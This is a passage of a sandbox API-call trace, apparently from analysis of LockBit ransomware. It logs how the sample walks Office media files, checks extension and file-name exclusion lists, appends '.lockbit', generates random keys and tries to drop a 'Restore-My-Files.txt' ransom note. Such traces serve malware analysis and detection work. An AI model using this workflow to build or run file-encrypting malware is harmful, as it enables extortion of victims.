(lpString1=".diagcab", lpString2=".GIF") returned -1 [0203.218] lstrcmpiW (lpString1=".lock", lpString2=".GIF") returned 1 [0203.218] lstrcmpiW (lpString1=".ocx", lpString2=".GIF") returned 1 [0203.218] lstrcmpiW (lpString1=".mpa", lpString2=".GIF") returned 1 [0203.218] lstrcmpiW (lpString1=".cpl", lpString2=".GIF") returned -1 [0203.218] lstrcmpiW (lpString1=".mod", lpString2=".GIF") returned 1 [0203.218] lstrcmpiW (lpString1=".hta", lpString2=".GIF") returned 1 [0203.218] lstrcmpiW (lpString1=".icns", lpString2=".GIF") returned 1 [0203.218] lstrcmpiW (lpString1=".prf", lpString2=".GIF") returned 1 [0203.218] lstrcmpiW (lpString1=".rtp", lpString2=".GIF") returned 1 [0203.218] lstrcmpiW (lpString1=".diagcfg", lpString2=".GIF") returned -1 [0203.219] lstrcmpiW (lpString1=".msstyles", lpString2=".GIF") returned 1 [0203.219] lstrcmpiW (lpString1=".bin", lpString2=".GIF") returned -1 [0203.219] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0203.219] lstrcmpiW (lpString1=".shs", lpString2=".GIF") returned 1 [0203.219] lstrcmpiW (lpString1=".drv", lpString2=".GIF") returned -1 [0203.219] lstrcmpiW (lpString1=".wpx", lpString2=".GIF") returned 1 [0203.219] lstrcmpiW (lpString1=".bat", lpString2=".GIF") returned -1 [0203.219] lstrcmpiW (lpString1=".rom", lpString2=".GIF") returned 1 [0203.219] lstrcmpiW (lpString1=".msc", lpString2=".GIF") returned 1 [0203.219] lstrcmpiW (lpString1=".spl", lpString2=".GIF") returned 1 [0203.219] lstrcmpiW (lpString1=".ps1", lpString2=".GIF") returned 1 [0203.219] lstrcmpiW (lpString1=".msu", lpString2=".GIF") returned 1 [0203.219] lstrcmpiW (lpString1=".ics", lpString2=".GIF") returned 1 [0203.219] lstrcmpiW (lpString1=".key", lpString2=".GIF") returned 1 [0203.219] lstrcmpiW (lpString1=".mp3", lpString2=".GIF") returned 1 [0203.219] lstrcmpiW (lpString1=".reg", lpString2=".GIF") returned 1 [0203.219] lstrcmpiW (lpString1=".dll", lpString2=".GIF") returned -1 [0203.219] lstrcmpiW (lpString1=".ini", lpString2=".GIF") returned 1 [0203.219] lstrcmpiW (lpString1=".idx", lpString2=".GIF") returned 1 [0203.219] lstrcmpiW (lpString1=".sys", lpString2=".GIF") returned 1 [0203.219] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0203.219] lstrcmpiW (lpString1=".ico", lpString2=".GIF") returned 1 [0203.219] lstrcmpiW (lpString1=".lnk", lpString2=".GIF") returned 1 [0203.219] lstrcmpiW (lpString1=".rdp", lpString2=".GIF") returned 1 [0203.219] lstrcmpiW (lpString1=".lockbit", lpString2=".GIF") returned 1 [0203.219] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="BD14565_.GIF") returned 1 [0203.219] lstrcmpiW (lpString1="ntldr", lpString2="BD14565_.GIF") returned 1 [0203.219] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="BD14565_.GIF") returned 1 [0203.219] lstrcmpiW (lpString1="bootsect.bak", lpString2="BD14565_.GIF") returned 1 [0203.219] lstrcmpiW (lpString1="autorun.inf", lpString2="BD14565_.GIF") returned -1 [0203.219] lstrcmpiW (lpString1="thumbs.db", lpString2="BD14565_.GIF") returned 1 [0203.219] lstrcmpiW (lpString1="iconcache.db", lpString2="BD14565_.GIF") returned 1 [0203.219] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\") returned="" [0203.220] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD14565_.GIF") returned=".GIF" [0203.220] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0203.220] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0203.220] lstrcmpiW (lpString1=".7z", lpString2=".GIF") returned -1 [0203.220] lstrcmpiW (lpString1=".ckp", lpString2=".GIF") returned -1 [0203.220] lstrcmpiW (lpString1=".dacpac", lpString2=".GIF") returned -1 [0203.220] lstrcmpiW (lpString1=".db", lpString2=".GIF") returned -1 [0203.220] lstrcmpiW (lpString1=".db-shm", lpString2=".GIF") returned -1 [0203.220] lstrcmpiW (lpString1=".db-wal", lpString2=".GIF") returned -1 [0203.220] lstrcmpiW (lpString1=".db3", lpString2=".GIF") returned -1 [0203.220] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0203.220] lstrcmpiW (lpString1=".dbc", lpString2=".GIF") returned -1 [0203.220] lstrcmpiW (lpString1=".dbs", lpString2=".GIF") returned -1 [0203.220] lstrcmpiW (lpString1=".dbt", lpString2=".GIF") returned -1 [0203.220] lstrcmpiW (lpString1=".dbv", lpString2=".GIF") returned -1 [0203.220] lstrcmpiW (lpString1=".frm", lpString2=".GIF") returned -1 [0203.220] lstrcmpiW (lpString1=".mdf", lpString2=".GIF") returned 1 [0203.220] lstrcmpiW (lpString1=".mrg", lpString2=".GIF") returned 1 [0203.220] lstrcmpiW (lpString1=".mwb", lpString2=".GIF") returned 1 [0203.220] lstrcmpiW (lpString1=".myd", lpString2=".GIF") returned 1 [0203.220] lstrcmpiW (lpString1=".ndf", lpString2=".GIF") returned 1 [0203.220] lstrcmpiW (lpString1=".qry", lpString2=".GIF") returned 1 [0203.220] lstrcmpiW (lpString1=".sdb", lpString2=".GIF") returned 1 [0203.220] lstrcmpiW (lpString1=".sdf", lpString2=".GIF") returned 1 [0203.220] lstrcmpiW (lpString1=".sql", lpString2=".GIF") returned 1 [0203.220] lstrcmpiW (lpString1=".sqlite", lpString2=".GIF") returned 1 [0203.220] lstrcmpiW (lpString1=".sqlite3", lpString2=".GIF") returned 1 [0203.220] lstrcmpiW (lpString1=".sqlitedb", lpString2=".GIF") returned 1 [0203.220] lstrcmpiW (lpString1=".tmd", lpString2=".GIF") returned 1 [0203.221] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD14565_.GIF.lockbit") returned 78 [0203.221] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD14565_.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\bd14565_.gif"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2a8 [0203.222] CreateIoCompletionPort (FileHandle=0x2a8, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0203.222] malloc (_Size=0x40068) returned 0x3df0008 [0203.222] GetFileSizeEx (in: hFile=0x2a8, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=183) returned 1 [0203.222] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0203.223] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0203.223] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0203.223] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0203.223] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0203.223] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0203.223] ReadFile (in: hFile=0x2a8, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 0x0 [0203.226] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD14565_.GIF.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD14565_.GIF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0203.226] malloc (_Size=0xb2) returned 0x1fa2ed8 [0203.226] NtSetInformationFile (FileHandle=0x2a8, IoStatusBlock=0x3d6aa8c, FileInformation=0x1fa2ed8, Length=0xb2, FileInformationClass=0xa) returned 0xc0000008 [0203.227] free (_Block=0x1fa2ed8) [0203.227] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD14565_.GIF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS") returned 1 [0203.227] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\Restore-My-Files.txt") returned 78 [0203.227] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0203.227] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7eb38a00, ftCreationTime.dwHighDateTime=0x1bd8f90, ftLastAccessTime.dwLowDateTime=0xbc92c1a0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0x7eb38a00, ftLastWriteTime.dwHighDateTime=0x1bd8f90, nFileSizeHigh=0x0, nFileSizeLow=0xc8, dwReserved0=0x0, dwReserved1=0x0, cFileName="BD14578_.GIF", cAlternateFileName="")) returned 1 [0203.227] lstrcmpiW (lpString1=".", lpString2="BD14578_.GIF") returned -1 [0203.227] lstrcmpiW (lpString1="..", lpString2="BD14578_.GIF") returned -1 [0203.227] PathFindExtensionW (pszPath="BD14578_.GIF") returned=".GIF" [0203.227] lstrcmpiW (lpString1=".386", lpString2=".GIF") returned -1 [0203.227] lstrcmpiW (lpString1=".cmd", lpString2=".GIF") returned -1 [0203.227] lstrcmpiW (lpString1=".exe", lpString2=".GIF") returned -1 [0203.227] lstrcmpiW (lpString1=".ani", lpString2=".GIF") returned -1 [0203.227] lstrcmpiW (lpString1=".adv", lpString2=".GIF") returned -1 [0203.227] lstrcmpiW (lpString1=".theme", lpString2=".GIF") returned 1 [0203.227] lstrcmpiW (lpString1=".msi", lpString2=".GIF") returned 1 [0203.227] lstrcmpiW (lpString1=".msp", lpString2=".GIF") returned 1 [0203.227] lstrcmpiW (lpString1=".com", lpString2=".GIF") returned -1 [0203.227] lstrcmpiW (lpString1=".diagpkg", lpString2=".GIF") returned -1 [0203.227] lstrcmpiW (lpString1=".nls", lpString2=".GIF") returned 1 [0203.227] lstrcmpiW (lpString1=".diagcab", lpString2=".GIF") returned -1 [0203.227] lstrcmpiW (lpString1=".lock", lpString2=".GIF") returned 1 [0203.227] lstrcmpiW (lpString1=".ocx", lpString2=".GIF") returned 1 [0203.227] lstrcmpiW (lpString1=".mpa", lpString2=".GIF") returned 1 [0203.227] lstrcmpiW (lpString1=".cpl", lpString2=".GIF") returned -1 [0203.227] lstrcmpiW (lpString1=".mod", lpString2=".GIF") returned 1 [0203.227] lstrcmpiW (lpString1=".hta", lpString2=".GIF") returned 1 [0203.227] lstrcmpiW (lpString1=".icns", lpString2=".GIF") returned 1 [0203.228] lstrcmpiW (lpString1=".prf", lpString2=".GIF") returned 1 [0203.228] lstrcmpiW (lpString1=".rtp", lpString2=".GIF") returned 1 [0203.228] lstrcmpiW (lpString1=".diagcfg", lpString2=".GIF") returned -1 [0203.228] lstrcmpiW (lpString1=".msstyles", lpString2=".GIF") returned 1 [0203.228] lstrcmpiW (lpString1=".bin", lpString2=".GIF") returned -1 [0203.228] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0203.228] lstrcmpiW (lpString1=".shs", lpString2=".GIF") returned 1 [0203.228] lstrcmpiW (lpString1=".drv", lpString2=".GIF") returned -1 [0203.228] lstrcmpiW (lpString1=".wpx", lpString2=".GIF") returned 1 [0203.228] lstrcmpiW (lpString1=".bat", lpString2=".GIF") returned -1 [0203.228] lstrcmpiW (lpString1=".rom", lpString2=".GIF") returned 1 [0203.228] lstrcmpiW (lpString1=".msc", lpString2=".GIF") returned 1 [0203.228] lstrcmpiW (lpString1=".spl", lpString2=".GIF") returned 1 [0203.228] lstrcmpiW (lpString1=".ps1", lpString2=".GIF") returned 1 [0203.228] lstrcmpiW (lpString1=".msu", lpString2=".GIF") returned 1 [0203.228] lstrcmpiW (lpString1=".ics", lpString2=".GIF") returned 1 [0203.228] lstrcmpiW (lpString1=".key", lpString2=".GIF") returned 1 [0203.228] lstrcmpiW (lpString1=".mp3", lpString2=".GIF") returned 1 [0203.228] lstrcmpiW (lpString1=".reg", lpString2=".GIF") returned 1 [0203.228] lstrcmpiW (lpString1=".dll", lpString2=".GIF") returned -1 [0203.228] lstrcmpiW (lpString1=".ini", lpString2=".GIF") returned 1 [0203.228] lstrcmpiW (lpString1=".idx", lpString2=".GIF") returned 1 [0203.228] lstrcmpiW (lpString1=".sys", lpString2=".GIF") returned 1 [0203.228] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0203.228] lstrcmpiW (lpString1=".ico", lpString2=".GIF") returned 1 [0203.228] lstrcmpiW (lpString1=".lnk", lpString2=".GIF") returned 1 [0203.228] lstrcmpiW (lpString1=".rdp", lpString2=".GIF") returned 1 [0203.228] lstrcmpiW (lpString1=".lockbit", lpString2=".GIF") returned 1 [0203.228] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="BD14578_.GIF") returned 1 [0203.228] lstrcmpiW (lpString1="ntldr", lpString2="BD14578_.GIF") returned 1 [0203.229] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="BD14578_.GIF") returned 1 [0203.229] lstrcmpiW (lpString1="bootsect.bak", lpString2="BD14578_.GIF") returned 1 [0203.229] lstrcmpiW (lpString1="autorun.inf", lpString2="BD14578_.GIF") returned -1 [0203.229] lstrcmpiW (lpString1="thumbs.db", lpString2="BD14578_.GIF") returned 1 [0203.229] lstrcmpiW (lpString1="iconcache.db", lpString2="BD14578_.GIF") returned 1 [0203.229] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\") returned="" [0203.229] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD14578_.GIF") returned=".GIF" [0203.229] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0203.229] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0203.229] lstrcmpiW (lpString1=".7z", lpString2=".GIF") returned -1 [0203.229] lstrcmpiW (lpString1=".ckp", lpString2=".GIF") returned -1 [0203.229] lstrcmpiW (lpString1=".dacpac", lpString2=".GIF") returned -1 [0203.229] lstrcmpiW (lpString1=".db", lpString2=".GIF") returned -1 [0203.229] lstrcmpiW (lpString1=".db-shm", lpString2=".GIF") returned -1 [0203.229] lstrcmpiW (lpString1=".db-wal", lpString2=".GIF") returned -1 [0203.229] lstrcmpiW (lpString1=".db3", lpString2=".GIF") returned -1 [0203.229] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0203.229] lstrcmpiW (lpString1=".dbc", lpString2=".GIF") returned -1 [0203.229] lstrcmpiW (lpString1=".dbs", lpString2=".GIF") returned -1 [0203.229] lstrcmpiW (lpString1=".dbt", lpString2=".GIF") returned -1 [0203.229] lstrcmpiW (lpString1=".dbv", lpString2=".GIF") returned -1 [0203.229] lstrcmpiW (lpString1=".frm", lpString2=".GIF") returned -1 [0203.229] lstrcmpiW (lpString1=".mdf", lpString2=".GIF") returned 1 [0203.229] lstrcmpiW (lpString1=".mrg", lpString2=".GIF") returned 1 [0203.229] lstrcmpiW (lpString1=".mwb", lpString2=".GIF") returned 1 [0203.229] lstrcmpiW (lpString1=".myd", lpString2=".GIF") returned 1 [0203.229] lstrcmpiW (lpString1=".ndf", lpString2=".GIF") returned 1 [0203.229] lstrcmpiW (lpString1=".qry", lpString2=".GIF") returned 1 [0203.229] lstrcmpiW (lpString1=".sdb", lpString2=".GIF") returned 1 [0203.229] lstrcmpiW (lpString1=".sdf", lpString2=".GIF") returned 1 [0203.229] lstrcmpiW (lpString1=".sql", lpString2=".GIF") returned 1 [0203.229] lstrcmpiW (lpString1=".sqlite", lpString2=".GIF") returned 1 [0203.229] lstrcmpiW (lpString1=".sqlite3", lpString2=".GIF") returned 1 [0203.229] lstrcmpiW (lpString1=".sqlitedb", lpString2=".GIF") returned 1 [0203.229] lstrcmpiW (lpString1=".tmd", lpString2=".GIF") returned 1 [0203.230] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD14578_.GIF.lockbit") returned 78 [0203.230] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD14578_.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\bd14578_.gif"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2a8 [0203.231] CreateIoCompletionPort (FileHandle=0x2a8, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0203.231] malloc (_Size=0x40068) returned 0x3df0008 [0203.231] GetFileSizeEx (in: hFile=0x2a8, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=200) returned 1 [0203.231] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0203.231] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0203.231] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0203.231] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0203.232] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0203.232] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0203.232] ReadFile (in: hFile=0x2a8, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 0x0 [0203.235] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD14578_.GIF.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD14578_.GIF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0203.235] malloc (_Size=0xb2) returned 0x1fa2ed8 [0203.235] NtSetInformationFile (FileHandle=0x2a8, IoStatusBlock=0x3d6aa8c, FileInformation=0x1fa2ed8, Length=0xb2, FileInformationClass=0xa) returned 0xc0000008 [0203.235] free (_Block=0x1fa2ed8) [0203.235] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD14578_.GIF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS") returned 1 [0203.235] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\Restore-My-Files.txt") returned 78 [0203.236] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0203.236] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7eb38a00, ftCreationTime.dwHighDateTime=0x1bd8f90, ftLastAccessTime.dwLowDateTime=0xbc92c1a0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0x7eb38a00, ftLastWriteTime.dwHighDateTime=0x1bd8f90, nFileSizeHigh=0x0, nFileSizeLow=0x10b, dwReserved0=0x0, dwReserved1=0x0, cFileName="BD14579_.GIF", cAlternateFileName="")) returned 1 [0203.236] lstrcmpiW (lpString1=".", lpString2="BD14579_.GIF") returned -1 [0203.236] lstrcmpiW (lpString1="..", lpString2="BD14579_.GIF") returned -1 [0203.236] PathFindExtensionW (pszPath="BD14579_.GIF") returned=".GIF" [0203.236] lstrcmpiW (lpString1=".386", lpString2=".GIF") returned -1 [0203.236] lstrcmpiW (lpString1=".cmd", lpString2=".GIF") returned -1 [0203.236] lstrcmpiW (lpString1=".exe", lpString2=".GIF") returned -1 [0203.236] lstrcmpiW (lpString1=".ani", lpString2=".GIF") returned -1 [0203.236] lstrcmpiW (lpString1=".adv", lpString2=".GIF") returned -1 [0203.236] lstrcmpiW (lpString1=".theme", lpString2=".GIF") returned 1 [0203.236] lstrcmpiW (lpString1=".msi", lpString2=".GIF") returned 1 [0203.236] lstrcmpiW (lpString1=".msp", lpString2=".GIF") returned 1 [0203.236] lstrcmpiW (lpString1=".com", lpString2=".GIF") returned -1 [0203.236] lstrcmpiW (lpString1=".diagpkg", lpString2=".GIF") returned -1 [0203.236] lstrcmpiW (lpString1=".nls", lpString2=".GIF") returned 1 [0203.236] lstrcmpiW (lpString1=".diagcab", lpString2=".GIF") returned -1 [0203.236] lstrcmpiW (lpString1=".lock", lpString2=".GIF") returned 1 [0203.236] lstrcmpiW (lpString1=".ocx", lpString2=".GIF") returned 1 [0203.236] lstrcmpiW (lpString1=".mpa", lpString2=".GIF") returned 1 [0203.236] lstrcmpiW (lpString1=".cpl", lpString2=".GIF") returned -1 [0203.236] lstrcmpiW (lpString1=".mod", lpString2=".GIF") returned 1 [0203.236] lstrcmpiW (lpString1=".hta", lpString2=".GIF") returned 1 [0203.236] lstrcmpiW (lpString1=".icns", lpString2=".GIF") returned 1 [0203.236] lstrcmpiW (lpString1=".prf", lpString2=".GIF") returned 1 [0203.236] lstrcmpiW (lpString1=".rtp", lpString2=".GIF") returned 1 [0203.236] lstrcmpiW (lpString1=".diagcfg", lpString2=".GIF") returned -1 [0203.236] lstrcmpiW (lpString1=".msstyles", lpString2=".GIF") returned 1 [0203.236] lstrcmpiW (lpString1=".bin", lpString2=".GIF") returned -1 [0203.236] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0203.236] lstrcmpiW (lpString1=".shs", lpString2=".GIF") returned 1 [0203.236] lstrcmpiW (lpString1=".drv", lpString2=".GIF") returned -1 [0203.237] lstrcmpiW (lpString1=".wpx", lpString2=".GIF") returned 1 [0203.237] lstrcmpiW (lpString1=".bat", lpString2=".GIF") returned -1 [0203.237] lstrcmpiW (lpString1=".rom", lpString2=".GIF") returned 1 [0203.237] lstrcmpiW (lpString1=".msc", lpString2=".GIF") returned 1 [0203.237] lstrcmpiW (lpString1=".spl", lpString2=".GIF") returned 1 [0203.237] lstrcmpiW (lpString1=".ps1", lpString2=".GIF") returned 1 [0203.237] lstrcmpiW (lpString1=".msu", lpString2=".GIF") returned 1 [0203.237] lstrcmpiW (lpString1=".ics", lpString2=".GIF") returned 1 [0203.237] lstrcmpiW (lpString1=".key", lpString2=".GIF") returned 1 [0203.237] lstrcmpiW (lpString1=".mp3", lpString2=".GIF") returned 1 [0203.237] lstrcmpiW (lpString1=".reg", lpString2=".GIF") returned 1 [0203.237] lstrcmpiW (lpString1=".dll", lpString2=".GIF") returned -1 [0203.237] lstrcmpiW (lpString1=".ini", lpString2=".GIF") returned 1 [0203.237] lstrcmpiW (lpString1=".idx", lpString2=".GIF") returned 1 [0203.237] lstrcmpiW (lpString1=".sys", lpString2=".GIF") returned 1 [0203.237] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0203.237] lstrcmpiW (lpString1=".ico", lpString2=".GIF") returned 1 [0203.237] lstrcmpiW (lpString1=".lnk", lpString2=".GIF") returned 1 [0203.237] lstrcmpiW (lpString1=".rdp", lpString2=".GIF") returned 1 [0203.237] lstrcmpiW (lpString1=".lockbit", lpString2=".GIF") returned 1 [0203.237] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="BD14579_.GIF") returned 1 [0203.237] lstrcmpiW (lpString1="ntldr", lpString2="BD14579_.GIF") returned 1 [0203.237] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="BD14579_.GIF") returned 1 [0203.237] lstrcmpiW (lpString1="bootsect.bak", lpString2="BD14579_.GIF") returned 1 [0203.237] lstrcmpiW (lpString1="autorun.inf", lpString2="BD14579_.GIF") returned -1 [0203.237] lstrcmpiW (lpString1="thumbs.db", lpString2="BD14579_.GIF") returned 1 [0203.237] lstrcmpiW (lpString1="iconcache.db", lpString2="BD14579_.GIF") returned 1 [0203.237] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\") returned="" [0203.237] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD14579_.GIF") returned=".GIF" [0203.237] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0203.237] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0203.237] lstrcmpiW (lpString1=".7z", lpString2=".GIF") returned -1 [0203.237] lstrcmpiW (lpString1=".ckp", lpString2=".GIF") returned -1 [0203.237] lstrcmpiW (lpString1=".dacpac", lpString2=".GIF") returned -1 [0203.237] lstrcmpiW (lpString1=".db", lpString2=".GIF") returned -1 [0203.237] lstrcmpiW (lpString1=".db-shm", lpString2=".GIF") returned -1 [0203.238] lstrcmpiW (lpString1=".db-wal", lpString2=".GIF") returned -1 [0203.238] lstrcmpiW (lpString1=".db3", lpString2=".GIF") returned -1 [0203.238] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0203.238] lstrcmpiW (lpString1=".dbc", lpString2=".GIF") returned -1 [0203.238] lstrcmpiW (lpString1=".dbs", lpString2=".GIF") returned -1 [0203.238] lstrcmpiW (lpString1=".dbt", lpString2=".GIF") returned -1 [0203.238] lstrcmpiW (lpString1=".dbv", lpString2=".GIF") returned -1 [0203.238] lstrcmpiW (lpString1=".frm", lpString2=".GIF") returned -1 [0203.238] lstrcmpiW (lpString1=".mdf", lpString2=".GIF") returned 1 [0203.238] lstrcmpiW (lpString1=".mrg", lpString2=".GIF") returned 1 [0203.238] lstrcmpiW (lpString1=".mwb", lpString2=".GIF") returned 1 [0203.238] lstrcmpiW (lpString1=".myd", lpString2=".GIF") returned 1 [0203.238] lstrcmpiW (lpString1=".ndf", lpString2=".GIF") returned 1 [0203.238] lstrcmpiW (lpString1=".qry", lpString2=".GIF") returned 1 [0203.238] lstrcmpiW (lpString1=".sdb", lpString2=".GIF") returned 1 [0203.238] lstrcmpiW (lpString1=".sdf", lpString2=".GIF") returned 1 [0203.238] lstrcmpiW (lpString1=".sql", lpString2=".GIF") returned 1 [0203.238] lstrcmpiW (lpString1=".sqlite", lpString2=".GIF") returned 1 [0203.238] lstrcmpiW (lpString1=".sqlite3", lpString2=".GIF") returned 1 [0203.238] lstrcmpiW (lpString1=".sqlitedb", lpString2=".GIF") returned 1 [0203.238] lstrcmpiW (lpString1=".tmd", lpString2=".GIF") returned 1 [0203.238] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD14579_.GIF.lockbit") returned 78 [0203.238] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD14579_.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\bd14579_.gif"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, 